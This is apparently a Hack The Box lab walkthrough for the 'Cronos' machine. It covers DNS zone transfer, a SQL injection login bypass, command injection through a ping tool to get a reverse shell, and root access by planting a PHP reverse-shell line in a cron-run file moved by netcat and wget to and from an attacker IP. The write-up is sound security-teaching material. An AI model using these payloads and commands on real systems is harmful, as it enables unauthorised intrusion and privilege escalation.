Cronos has been released in 2017, Cronos is rated as medium.
By scanning the machine we found out that there is DNS running on the system,By querying the DNS server, we found out there is an subdomain called; admin.cronos.htb. That subdomain is vulnerable to a SQL injection bypass. After we successfully bypass the login page, we found out that there was a ping tool that is vulnerable to code execution which enables us to gain a user level system access. Since we have user level access we want to expand that to root level system access, we where able to do then by exploiting a Cronjob.
nmap -sV -sC 10.10.10.13
I saw that port 53 (DNS) is open to I try to enumerate the DNS to query the DNS records.
dig axfr @10.10.10.13 cronos.htb
I added admin.cronos.htb to /etc/hosts file.
Web Page Enumeration
We see a login page.
I tried basic SQL bypass and I succeed.
‘ or 1=1– –
After we successful logged, we see the following page.
I started Burp Suite, and intercepted the request.
Basic Command Execution
I tried to ping myself first. In order to test if we have indeed command execution.
Before I execute it, I started tcpdump in order to catch the ICMP packet.
tcpdump -i tun0 icmp
Getting Reverse Shell
Now that our command execution is confirmed, we can change the ping payload to a reverse shell payload.
Now we have a reverse shell.
By basic enumeration, I found an interesting crontab.
File Transfer with Netcat
By viewing the directory, I can modify 1 file(artisan). By putting there, a reverse shell that will gives us a root shell back.
First, I downloaded the file to my system in order to modify it.
On Target System: nc -nv 10.10.14.4 1234 < artisan
On My Own System: nc -lnvp 1234 > artisan
Modify Artisan File
I added the following 2 lines to the file:
exec("/bin/sh -i <&3 >&3 2>&3");
After this I transferred the file back to the target system, and overwrite the current artisan file.
On Target System; wget http://10.10.14.4:8000/artisan
On Kali System: python3 -m http.server
Now we have a root shell.
whoami && ifconfig && cat root.txt; echo
Made by: IceL0rd
Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.